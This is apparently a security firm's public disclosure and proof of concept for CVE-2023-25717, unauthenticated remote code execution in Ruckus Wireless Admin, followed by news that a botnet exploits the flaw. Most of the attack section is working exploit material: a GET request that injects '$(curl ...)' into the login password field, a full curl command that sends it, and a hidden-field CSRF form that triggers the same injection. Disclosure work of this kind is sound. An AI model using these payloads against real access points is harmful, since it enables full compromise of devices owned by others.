Headline
CVE-2023-25717: Proof of Concept - Ruckus Wireless Admin (=<10.4 - Unauthenticated Remote Code Execution / CSRF / SSRF) - CYBIR - Cyber Security, Incident Response, & Digital Forensics
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.
Ruckus Wireless Admin suffers from several serious web application weaknesses which allow for Remote Code Execution(RCE), Server-Side Request Forgert (SSRF), Cross-Site Request Forgery (CSRF), and other conditions. This can result in total compromise of the affected devices.
In this public disclosure, Unauthenticated RCE & CSRF vectors are disclosed. Ruckus acknowledged the issue as “known”, however, no public references or CVEs are publicly available or shared.
Other conditions are present and will be disclosed at a future date.
Date of Initial Disclosure to Vendor – Dec 13th, 2022.
Discoverer – Ken Pyle, CYBIR.
Ruckus Wireless Admin – Login Portal
The following PoC Code snippets allows for RCE / CSRF on Ruckus Wireless Admin (10.4 and earlier):
Proof of Concept – Remote Code Execution (CURL)
GET /forms/doLogin?login_username=admin&password=password$(curl%20192.168.1.1)&x=0&y=0
CURL Command to Launch Command (CURL):
curl -i -s -k -X $’GET’ \
-H $’Host: CYBIRPOC’ -H $’Origin: https://CYBIRPOC’ -H $’Referer: https://CYBIRPOC/login.asp’ -H $’Upgrade-Insecure-Requests: 1′ -H $’Sec-Fetch-Dest: document’ -H $’Sec-Fetch-Mode: navigate’ -H $’Sec-Fetch-Site: same-origin’ -H $’Sec-Fetch-User: ?1′ -H $’Te: trailers’ -H $’Connection: close’ \
$’https://CYBIRPOC/forms/doLogin?login_username=admin&password=password$(curl%20192.168.1.1)&x=0&y=0′
CSRF – PoC Code Snippet
In this HTML code snippet, the attacker creates a CROSS-SITE REQUEST FORGERY (CSRF) triggering page:
<form action=”https://target/forms/doLogin”> <input type=”hidden” name=”login_username” value=”admin” /> <input type=”hidden” name=”password” value=”password$(curl 192.168.1.1)” /> <input type=”hidden” name=”x” value=”0″ /> <input type=”hidden” name=”y” value=”0″ /> <input type=”submit” value=”Submit request” /> </form>
Using this code, an attacker can stage exploit code, exploit the CSRF condition and execute remote code on the target. Seen here, the CSRF/ RCE is triggered by the attacker:
Related news
Categories: Exploits and vulnerabilities Categories: News Tags: Ruckus Tags: CISA Tags: AndoryuBot Tags: CVE-2023-25717 Tags: 163.123.142.146 CISA has added a Ruckus vulnerability being abused by the AndoryuBot botnet to its catalog. (Read more...) The post Update now! Ruckus vulnerability added to CISA’s list of actively exploited bugs appeared first on Malwarebytes Labs.
A nascent botnet called Andoryu has been found to exploit a now-patched critical security flaw in the Ruckus Wireless Admin panel to break into vulnerable devices. The flaw, tracked as CVE-2023-25717 (CVSS score: 9.8), stems from improper handling of HTTP requests, leading to unauthenticated remote code execution and a complete compromise of wireless Access Point (AP) equipment. Andoryu was